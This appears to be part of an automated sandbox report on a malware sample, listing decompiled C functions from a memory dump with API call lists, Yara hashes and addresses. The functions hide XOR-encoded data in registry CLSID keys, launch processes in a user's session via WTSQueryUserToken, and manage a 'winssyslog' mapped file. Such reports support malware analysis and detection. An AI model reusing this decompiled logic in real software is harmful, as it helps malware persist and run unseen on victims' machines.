                                                                                    0x04ebe008
                                                                                    0x00000000
                                                                                    0x04ebdfa5
                                                                                    0x04ebdfa5
                                                                                    0x04ebdfaa
                                                                                    0x04ebdfad
                                                                                    0x04ebdfaf
                                                                                    0x00000000
                                                                                    0x04ebdfb1
                                                                                    0x04ebdfbc
                                                                                    0x04ebdfc8
                                                                                    0x04ebdfcb
                                                                                    0x04ebdfcf
                                                                                    0x04ebdfcf
                                                                                    0x04ebdfd2
                                                                                    0x04ebdfd6
                                                                                    0x04ebdfe5
                                                                                    0x04ebdfe8
                                                                                    0x04ebdfea
                                                                                    0x04ebdfee
                                                                                    0x04ebdff0
                                                                                    0x04ebdff1
                                                                                    0x04ebdff5
                                                                                    0x04ebe003
                                                                                    0x04ebe003
                                                                                    0x04ebdfaf
                                                                                    0x04ebdf3b
                                                                                    0x04ebdf3b
                                                                                    0x04ebdf40
                                                                                    0x04ebdf45
                                                                                    0x04ebe00d
                                                                                    0x04ebe013
                                                                                    0x04ebdf4b
                                                                                    0x04ebdf56
                                                                                    0x04ebdf62
                                                                                    0x04ebdf65
                                                                                    0x04ebdf69
                                                                                    0x04ebdf69
                                                                                    0x04ebdf6c
                                                                                    0x04ebdf70
                                                                                    0x04ebdf7f
                                                                                    0x04ebdf82
                                                                                    0x04ebdf84
                                                                                    0x04ebdf88
                                                                                    0x04ebdf8a
                                                                                    0x04ebdf8b
                                                                                    0x04ebdf8f
                                                                                    0x04ebdf9d
                                                                                    0x04ebdf9d
                                                                                    0x04ebdf45

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,04EBD46F,?,?), ref: 04EBDF2D
                                                                                    • LocalSize.KERNEL32 ref: 04EBDF52
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,04EBD46F,?,?), ref: 04EBDF5C
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDF7F
                                                                                    • LocalSize.KERNEL32 ref: 04EBDF82
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDF95
                                                                                      • Part of subcall function 04EBDE40: GetTcpTable.IPHLPAPI(00000000,?,00000001), ref: 04EBDE60
                                                                                      • Part of subcall function 04EBDE40: GetTcpTable.IPHLPAPI(00000000,?,00000001), ref: 04EBDE7B
                                                                                    • LocalSize.KERNEL32 ref: 04EBDFB8
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,04EBD46F,?,?), ref: 04EBDFC2
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDFE5
                                                                                    • LocalSize.KERNEL32 ref: 04EBDFE8
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDFFB
                                                                                      • Part of subcall function 04EBDB70: LocalAlloc.KERNEL32(00000040,74E45A91,00000000,?,?), ref: 04EBDBBE
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBE0
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBFE
                                                                                      • Part of subcall function 04EBDB70: LocalSize.KERNEL32 ref: 04EBDC05
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 04EBDC1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Free$Size$Alloc$Table$Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 1439515551-0
                                                                                    • Opcode ID: c0daa8e014a3216806d279f935c729db051a27519f78ddfc595ab702f29fac7e
                                                                                    • Instruction ID: 1b999fa1e84b50401c7effd179511499b8a3a118bb7d65078798d17aa1435f9c
                                                                                    • Opcode Fuzzy Hash: c0daa8e014a3216806d279f935c729db051a27519f78ddfc595ab702f29fac7e
                                                                                    • Instruction Fuzzy Hash: 7E310A76A002186BD710EFA9DC80CABB7AEEF89265B044169FD59D7245DA31FD00CFE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBE850, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 153registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 93%
                                                                                    			E04EBE850(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v88;
				short _v608;
				short _v1128;
				void* _v1132;
				char _v1136;
				int* _v1140;
				int _v1144;
				void* _v1148;
				int _v1152;
				int _v1156;
				void* __ebp;
				signed int _t49;
				int* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				int _t84;
				signed int* _t85;
				signed int* _t89;
				char _t93;
				int* _t95;
				char _t96;
				int* _t98;
				signed int* _t99;
				signed int _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				signed int _t117;

				_t49 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t49 ^ _t101;
				_t95 = 0;
				_t85 = L"Pg";
				_v1140 = 0;
				E04EC6010(__ebx, _t85,  &_v88, 0, __esi);
				wsprintfW( &_v1128, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				_t103 = _t102 + 0xc;
				_t84 = 0;
				_t57 = RegOpenKeyExW(0x80000002,  &_v1128, 0, 0x20119,  &_v1132);
				if(_t57 == 0) {
					_v1144 = 0x104;
					if(RegEnumKeyExW(_v1132, 0,  &_v608,  &_v1144, _t57, _t57, _t57, _t57) == 0) {
						_push(__esi);
						do {
							_t84 = _t84 + 1;
							if(_v1144 == 0x10) {
								_v1152 = 4;
								_t98 = 0;
								_v1136 = 0;
								_v1148 = 0;
								if(RegOpenKeyExW(_v1132,  &_v608, 0, 0x20119,  &_v1148) != 0) {
									L8:
									_t96 = 1;
								} else {
									if(RegQueryValueExW(_v1148, "2", 0,  &_v1156,  &_v1136,  &_v1152) == 0) {
										_t98 =  ==  ? 1 : 0;
									}
									RegCloseKey(_v1148);
									_t96 = _v1136;
									if(_t98 == 0) {
										goto L8;
									}
								}
								_push(_t85);
								_v1136 = 0;
								_t85 = _v1132;
								_t99 = E04EC0C20(_t85,  &_v608, _t85,  &_v1136);
								_t103 = _t103 + 0xc;
								if(_t99 == 0) {
									_t95 = _v1140;
								} else {
									_t93 = _v1136;
									if(_t93 > 1) {
										_t31 = _t93 - 1; // -1
										_t74 = _t31;
										 *(_t74 + _t99) =  *(_t74 + _t99) ^  *_t99;
										_t75 = _t74 - 1;
										while(_t75 != 0) {
											 *(_t75 + _t99) =  *(_t75 + _t99) ^  *(_t75 +  &(_t99[0]));
											_t75 = _t75 - 1;
										}
										_t89 = _t75 + _t99;
										 *_t89 =  *_t89 ^ _t89[0];
										_t117 =  *_t89;
									}
									_t85 = _t99;
									_t72 = E04EBF010(_t84, _t93, _t96, _t99, _t117, 1, _t96);
									_t95 = _v1140;
									_t104 = _t103 + 8;
									if(_t72 != 0) {
										_v1140 = _t95;
									}
									E04ED573F(_t99);
									_t103 = _t104 + 4;
								}
							}
							_v1144 = 0x104;
						} while (RegEnumKeyExW(_v1132, _t84,  &_v608,  &_v1144, 0, 0, 0, 0) == 0);
					}
					RegCloseKey(_v1132);
				}
				return E04ED572E(_v8 ^ _t101);
			}

































                                                                                    0x04ebe859
                                                                                    0x04ebe860
                                                                                    0x04ebe865
                                                                                    0x04ebe86a
                                                                                    0x04ebe86f
                                                                                    0x04ebe875
                                                                                    0x04ebe88a
                                                                                    0x04ebe890
                                                                                    0x04ebe899
                                                                                    0x04ebe8ae
                                                                                    0x04ebe8b6
                                                                                    0x04ebe8c6
                                                                                    0x04ebe8e7
                                                                                    0x04ebe8ed
                                                                                    0x04ebe8f0
                                                                                    0x04ebe8f0
                                                                                    0x04ebe8f8
                                                                                    0x04ebe904
                                                                                    0x04ebe914
                                                                                    0x04ebe924
                                                                                    0x04ebe92a
                                                                                    0x04ebe938
                                                                                    0x04ebe98a
                                                                                    0x04ebe98a
                                                                                    0x04ebe93a
                                                                                    0x04ebe963
                                                                                    0x04ebe971
                                                                                    0x04ebe971
                                                                                    0x04ebe97a
                                                                                    0x04ebe980
                                                                                    0x04ebe988
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebe988
                                                                                    0x04ebe98f
                                                                                    0x04ebe996
                                                                                    0x04ebe9a2
                                                                                    0x04ebe9b3
                                                                                    0x04ebe9b5
                                                                                    0x04ebe9ba
                                                                                    0x04ebea11
                                                                                    0x04ebe9bc
                                                                                    0x04ebe9bc
                                                                                    0x04ebe9c5
                                                                                    0x04ebe9c9
                                                                                    0x04ebe9c9
                                                                                    0x04ebe9cc
                                                                                    0x04ebe9cf
                                                                                    0x04ebe9d2
                                                                                    0x04ebe9d8
                                                                                    0x04ebe9db
                                                                                    0x04ebe9db
                                                                                    0x04ebe9e0
                                                                                    0x04ebe9e6
                                                                                    0x04ebe9e6
                                                                                    0x04ebe9e6
                                                                                    0x04ebe9eb
                                                                                    0x04ebe9ed
                                                                                    0x04ebe9f2
                                                                                    0x04ebe9f8
                                                                                    0x04ebe9fd
                                                                                    0x04ebea00
                                                                                    0x04ebea00
                                                                                    0x04ebea07
                                                                                    0x04ebea0c
                                                                                    0x04ebea0c
                                                                                    0x04ebe9ba
                                                                                    0x04ebea25
                                                                                    0x04ebea44
                                                                                    0x04ebea4c
                                                                                    0x04ebea53
                                                                                    0x04ebea53
                                                                                    0x04ebea6a

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EBE88A
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04EBE8AE
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 04EBE8DF
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,74E043E0), ref: 04EBE930
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD124,00000000,?,?,00000004), ref: 04EBE95B
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EBE97A
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000010,00000000,00000000,00000000,00000000,74E043E0), ref: 04EBEA3E
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EBEA53
                                                                                    Strings
                                                                                    • SOFTWARE\Classes\CLSID\%s, xrefs: 04EBE884
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpen$EnumQueryValue$wsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 617139280-1183003970
                                                                                    • Opcode ID: 789a55ab489e4fdb4c276afa904a9c565925a176b39e3a4a53e0a8b8292dbd73
                                                                                    • Instruction ID: 2c70b32d174ab438916f5a86b2a2c5a4c13f88ddcb7cdec39f36b1286a4535fd
                                                                                    • Opcode Fuzzy Hash: 789a55ab489e4fdb4c276afa904a9c565925a176b39e3a4a53e0a8b8292dbd73
                                                                                    • Instruction Fuzzy Hash: 9F5187B19002289FDB218F64DC44FEAB77CEF45308F1051D9EA89A7101E771AE89CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBEA70, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 86%
                                                                                    			E04EBEA70(void* __ebx, char* __ecx, int __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				char _v616;
				signed int _t34;
				int _t64;
				void* _t78;
				void* _t79;
				char* _t85;
				signed int _t86;

				_t34 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t34 ^ _t86;
				_t64 = __edx;
				_t85 = __ecx;
				if(__edx >= 0x5c) {
					if(__edx !=  *((intOrPtr*)(__ecx + 0x1c)) + 0x5c +  *((intOrPtr*)(__ecx + 0x24)) +  *((intOrPtr*)(__ecx + 0x20))) {
						goto L1;
					} else {
						_push(__edi);
						E04EC6010(__edx, L"Pg",  &_v88, __edi, __ecx);
						wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s\\%s",  &_v88, __ecx + 0x28);
						E04EC5490(_t85, _t64);
						_v616 = 1;
						_v612 = 0;
						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0x20106, 0,  &_v612, 0) == 0) {
							RegSetValueExW(_v612, "2", 0, 4,  &_v616, 4);
							RegCloseKey(_v612);
						}
						_v612 = 0;
						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0x20106, 0,  &_v612, 0) == 0) {
							RegSetValueExW(_v612, "1", 0, 3, _t85, _t64);
							asm("sbb edi, edi");
							RegCloseKey(_v612);
						}
						if(_t64 > 1) {
							_t78 = _t64 - 1;
							 *(_t78 + _t85) =  *(_t78 + _t85) ^  *_t85;
							_t79 = _t78 - 1;
							while(_t79 != 0) {
								 *(_t79 + _t85) =  *(_t79 + _t85) ^  *(_t79 +  &(_t85[1]));
								_t79 = _t79 - 1;
							}
							 *(_t79 + _t85) =  *(_t79 + _t85) ^  *(_t79 +  &(_t85[1]));
						}
						return E04ED572E(_v8 ^ _t86);
					}
				} else {
					L1:
					return E04ED572E(_v8 ^ _t86);
				}
			}














                                                                                    0x04ebea79
                                                                                    0x04ebea80
                                                                                    0x04ebea84
                                                                                    0x04ebea87
                                                                                    0x04ebea8c
                                                                                    0x04ebeab0
                                                                                    0x00000000
                                                                                    0x04ebeab2
                                                                                    0x04ebeab2
                                                                                    0x04ebeabb
                                                                                    0x04ebead4
                                                                                    0x04ebeae1
                                                                                    0x04ebeaee
                                                                                    0x04ebeb0c
                                                                                    0x04ebeb2a
                                                                                    0x04ebeb44
                                                                                    0x04ebeb4c
                                                                                    0x04ebeb4c
                                                                                    0x04ebeb5a
                                                                                    0x04ebeb86
                                                                                    0x04ebeb9d
                                                                                    0x04ebeba7
                                                                                    0x04ebebaa
                                                                                    0x04ebebaa
                                                                                    0x04ebebb3
                                                                                    0x04ebebb7
                                                                                    0x04ebebba
                                                                                    0x04ebebbd
                                                                                    0x04ebebc0
                                                                                    0x04ebebc6
                                                                                    0x04ebebc9
                                                                                    0x04ebebc9
                                                                                    0x04ebebd2
                                                                                    0x04ebebd2
                                                                                    0x04ebebe7
                                                                                    0x04ebebe7
                                                                                    0x04ebea8f
                                                                                    0x04ebea8f
                                                                                    0x04ebea9f
                                                                                    0x04ebea9f

                                                                                    APIs
                                                                                    • wsprintfW.USER32 ref: 04EBEAD4
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 04EBEB1C
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD124,00000000,00000004,00000001,00000004), ref: 04EBEB44
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBEB4C
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020106,00000000,00000000,00000000), ref: 04EBEB7E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$CloseValuewsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s\%s$\
                                                                                    • API String ID: 1643814758-3376016971
                                                                                    • Opcode ID: ad99b57332ab9b180637fd34a156cf4b69f31c66b0242e7360f2e84e11cd811c
                                                                                    • Instruction ID: c7c706f7dff4f23b543f76b89dde41057200602bc0888b7d45a2e77ebf21a402
                                                                                    • Opcode Fuzzy Hash: ad99b57332ab9b180637fd34a156cf4b69f31c66b0242e7360f2e84e11cd811c
                                                                                    • Instruction Fuzzy Hash: 4141EB30604318ABD730DF68DC85FEA7BB9FF84704F500099E94AAA181D671AD44DB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBE6D0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 114registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 94%
                                                                                    			E04EBE6D0(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v92;
				short _v612;
				short _v1132;
				int _v1136;
				void* _v1140;
				void* _v1144;
				char _v1148;
				signed int _t27;
				int* _t35;
				char _t54;
				int _t65;
				signed int _t66;

				_t27 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t27 ^ _t66;
				_t54 = __ecx;
				E04EC6010(__ecx, L"Pg",  &_v92, __edi, __esi);
				wsprintfW( &_v1132, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v92);
				_t65 = 0;
				_t35 = RegOpenKeyExW(0x80000002,  &_v1132, 0, 0x20119,  &_v1140);
				if(_t35 != 0) {
					L8:
					if(_t54 == 0) {
						E04EBE630();
						return E04ED572E(_v8 ^ _t66);
					} else {
						E04EBE5C0();
						return E04ED572E(_v8 ^ _t66);
					}
				}
				_v1136 = 0x104;
				if(RegEnumKeyExW(_v1140, 0,  &_v612,  &_v1136, _t35, _t35, _t35, _t35) != 0) {
					L7:
					RegCloseKey(_v1140);
					goto L8;
				} else {
					do {
						_t65 = _t65 + 1;
						if(_v1136 == 0x10) {
							_v1148 = _t54;
							_v1144 = 0;
							if(RegCreateKeyExW(_v1140,  &_v612, 0, 0, 0, 0x20106, 0,  &_v1144, 0) == 0) {
								RegSetValueExW(_v1144, "2", 0, 4,  &_v1148, 4);
								RegCloseKey(_v1144);
							}
						}
						_v1136 = 0x104;
					} while (RegEnumKeyExW(_v1140, _t65,  &_v612,  &_v1136, 0, 0, 0, 0) == 0);
					goto L7;
				}
			}
















                                                                                    0x04ebe6d9
                                                                                    0x04ebe6e0
                                                                                    0x04ebe6e5
                                                                                    0x04ebe6f0
                                                                                    0x04ebe705
                                                                                    0x04ebe714
                                                                                    0x04ebe729
                                                                                    0x04ebe731
                                                                                    0x04ebe81a
                                                                                    0x04ebe81c
                                                                                    0x04ebe834
                                                                                    0x04ebe849
                                                                                    0x04ebe81e
                                                                                    0x04ebe81e
                                                                                    0x04ebe833
                                                                                    0x04ebe833
                                                                                    0x04ebe81c
                                                                                    0x04ebe741
                                                                                    0x04ebe768
                                                                                    0x04ebe812
                                                                                    0x04ebe818
                                                                                    0x00000000
                                                                                    0x04ebe770
                                                                                    0x04ebe770
                                                                                    0x04ebe770
                                                                                    0x04ebe778
                                                                                    0x04ebe782
                                                                                    0x04ebe79c
                                                                                    0x04ebe7b5
                                                                                    0x04ebe7cf
                                                                                    0x04ebe7db
                                                                                    0x04ebe7db
                                                                                    0x04ebe7b5
                                                                                    0x04ebe7eb
                                                                                    0x04ebe80a
                                                                                    0x00000000
                                                                                    0x04ebe770

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EBE705
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04EBE729
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 04EBE75A
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 04EBE7AD
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD124,00000000,00000004,?,00000004), ref: 04EBE7CF
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBE7DB
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000010,00000000,00000000,00000000,00000000), ref: 04EBE804
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EBE818
                                                                                    Strings
                                                                                    • SOFTWARE\Classes\CLSID\%s, xrefs: 04EBE6FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$EnumOpenValue$CreateQuerywsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 2517750250-1183003970
                                                                                    • Opcode ID: 1e28960e59683dce02f6305c8a4b727013348412db23b1f9e96121009b1f2eed
                                                                                    • Instruction ID: be800958df76569c90440dcc2c94f90e940092caa359fdc8a1661eedd3c05f6d
                                                                                    • Opcode Fuzzy Hash: 1e28960e59683dce02f6305c8a4b727013348412db23b1f9e96121009b1f2eed
                                                                                    • Instruction Fuzzy Hash: B14142B1640228BAEB209F65DC85FEAB77CEF44705F0011A6AF49E6180D7716E44CFA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC72A0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 91processlibraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 53%
                                                                                    			E04EC72A0(void* __ebx, intOrPtr __edx, void* __eflags, WCHAR* _a8, struct _PROCESS_INFORMATION* _a20) {
				void* _v8;
				void* _v12;
				struct _STARTUPINFOW _v80;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t26;
				_Unknown_base(*)()* _t27;
				void* _t29;
				void* _t34;
				long _t36;
				intOrPtr _t37;
				void* _t38;

				_t36 = 0;
				_t37 = __edx;
				E04EDDAD0(0,  &(_v80.lpReserved), 0, 0x40);
				_v80.cb = 0x44;
				_v80.lpDesktop = _t37;
				_v8 = 0;
				if(E04ECA980() != 2) {
					return CreateProcessW(0, _a8, 0, 0, 0, 0, 0, 0,  &_v80, _a20);
				} else {
					_t38 = E04EC70A0(__ebx, 0, _t37);
					if(_t38 != 0) {
						_v12 = 0;
						_t26 = LoadLibraryA("Wtsapi32.dll");
						if(_t26 != 0) {
							_t27 = GetProcAddress(_t26, "WTSQueryUserToken");
							if(_t27 != 0) {
								_push( &_v12);
								_push(_t38);
								if( *_t27() != 0) {
									_t29 =  &_v8;
									__imp__CreateEnvironmentBlock(_t29, _v12, 0);
									if(_t29 != 0) {
										_t29 = _v8;
										_t36 = 0x400;
									} else {
										_v8 = _t29;
									}
									CreateProcessAsUserW(_v12, 0, _a8, 0, 0, 0, _t36, _t29, 0,  &_v80, _a20);
									_t34 = _v8;
									if(_t34 != 0) {
										__imp__DestroyEnvironmentBlock(_t34);
									}
								}
							}
						}
					}
					return 0;
				}
			}















                                                                                    0x04ec72aa
                                                                                    0x04ec72b1
                                                                                    0x04ec72b3
                                                                                    0x04ec72bb
                                                                                    0x04ec72c2
                                                                                    0x04ec72c5
                                                                                    0x04ec72d0
                                                                                    0x04ec7385
                                                                                    0x04ec72d6
                                                                                    0x04ec72db
                                                                                    0x04ec72df
                                                                                    0x04ec72e6
                                                                                    0x04ec72e9
                                                                                    0x04ec72f1
                                                                                    0x04ec72f9
                                                                                    0x04ec7301
                                                                                    0x04ec7306
                                                                                    0x04ec7307
                                                                                    0x04ec730c
                                                                                    0x04ec7312
                                                                                    0x04ec7316
                                                                                    0x04ec731e
                                                                                    0x04ec7325
                                                                                    0x04ec7328
                                                                                    0x04ec7320
                                                                                    0x04ec7320
                                                                                    0x04ec7320
                                                                                    0x04ec7346
                                                                                    0x04ec734c
                                                                                    0x04ec7351
                                                                                    0x04ec7354
                                                                                    0x04ec7354
                                                                                    0x04ec7351
                                                                                    0x04ec730c
                                                                                    0x04ec7301
                                                                                    0x04ec72f1
                                                                                    0x04ec7361
                                                                                    0x04ec7361

                                                                                    APIs
                                                                                      • Part of subcall function 04ECA980: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04ECA9BE
                                                                                      • Part of subcall function 04ECA980: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 04ECA9D1
                                                                                      • Part of subcall function 04ECA980: FreeSid.ADVAPI32(?), ref: 04ECA9DA
                                                                                    • CreateProcessW.KERNEL32 ref: 04EC737A
                                                                                      • Part of subcall function 04EC70A0: GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 04EC70DD
                                                                                      • Part of subcall function 04EC70A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04EC70F5
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04EC72E9
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC72F9
                                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 04EC7316
                                                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,04EB6928,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04EC7346
                                                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 04EC7354
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$BlockEnvironmentLibraryLoadProcess$AddressAllocateCheckDestroyFreeInitializeMembershipProcTokenUserVersion
                                                                                    • String ID: D$WTSQueryUserToken$Wtsapi32.dll
                                                                                    • API String ID: 2441965042-1631787044
                                                                                    • Opcode ID: 07679bc921c39e977cd1045ecc53b0f4eaababe7862b343a5fae772a9d4cd578
                                                                                    • Instruction ID: 182173419655e0cb36daccb3ca6a3a225d4ae8f748a3ff903aa7581b13d584e5
                                                                                    • Opcode Fuzzy Hash: 07679bc921c39e977cd1045ecc53b0f4eaababe7862b343a5fae772a9d4cd578
                                                                                    • Instruction Fuzzy Hash: E4219272A0020ABBDF209FA59D05FFE7F78EB84715F144069FE05A6140EA74E9029B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB99B0, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 62sleepfilethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 81%
                                                                                    			E04EB99B0() {
				signed int _v8;
				short _v528;
				signed int _t9;
				signed int _t13;
				signed int _t14;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t30;

				_t9 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t9 ^ _t30;
				_push(_t22);
				_push(_t28);
				_push(_t26);
				_push(0);
				_t24 = L"winssyslog";
				E04EC6330(_t22, L"winssyslog",  &_v528, _t26, _t28, 8);
				_t13 = GetFileAttributesW( &_v528);
				_t27 = CloseHandle;
				_t23 = UnmapViewOfFile;
				_t14 = _t13 & 0xffffff00 | _t13 != 0xffffffff;
				 *0x4f068c9 = _t14;
				L1:
				while(1) {
					if(_t14 != 0) {
						L4:
						E04EBB5E0(_t23, _t24, _t27, _t36);
						_t14 =  *0x4f068c9; // 0x0
						if(_t14 != 1) {
							L7:
							_t24 =  *0x4f06adc; // 0x0
							if(_t24 != 0) {
								_t16 =  *(_t24 + 4);
								if(_t16 != 0) {
									TerminateThread(_t16, 0xffffffff);
									_t20 =  *0x4f06adc; // 0x0
									CloseHandle( *(_t20 + 4));
									_t24 =  *0x4f06adc; // 0x0
									 *(_t24 + 4) = 0;
								}
								UnmapViewOfFile(_t24);
								CloseHandle( *0x4f06ad8);
								_t14 =  *0x4f068c9; // 0x0
								 *0x4f06adc = 0;
							}
							continue;
						}
						do {
							Sleep(0x64);
							_t14 =  *0x4f068c9; // 0x0
						} while (_t14 == 1);
						goto L7;
					} else {
						do {
							Sleep(0x64);
							_t36 =  *0x4f068c9;
						} while ( *0x4f068c9 == 0);
						goto L4;
					}
				}
			}
















                                                                                    0x04eb99b9
                                                                                    0x04eb99c0
                                                                                    0x04eb99c3
                                                                                    0x04eb99c4
                                                                                    0x04eb99c5
                                                                                    0x04eb99c6
                                                                                    0x04eb99d0
                                                                                    0x04eb99d5
                                                                                    0x04eb99e4
                                                                                    0x04eb99f3
                                                                                    0x04eb99f9
                                                                                    0x04eb99ff
                                                                                    0x04eb9a02
                                                                                    0x00000000
                                                                                    0x04eb9a07
                                                                                    0x04eb9a09
                                                                                    0x04eb9a1d
                                                                                    0x04eb9a1d
                                                                                    0x04eb9a22
                                                                                    0x04eb9a29
                                                                                    0x04eb9a3d
                                                                                    0x04eb9a3d
                                                                                    0x04eb9a45
                                                                                    0x04eb9a47
                                                                                    0x04eb9a4c
                                                                                    0x04eb9a51
                                                                                    0x04eb9a57
                                                                                    0x04eb9a5f
                                                                                    0x04eb9a61
                                                                                    0x04eb9a67
                                                                                    0x04eb9a67
                                                                                    0x04eb9a6f
                                                                                    0x04eb9a77
                                                                                    0x04eb9a79
                                                                                    0x04eb9a7e
                                                                                    0x04eb9a7e
                                                                                    0x00000000
                                                                                    0x04eb9a45
                                                                                    0x04eb9a30
                                                                                    0x04eb9a32
                                                                                    0x04eb9a34
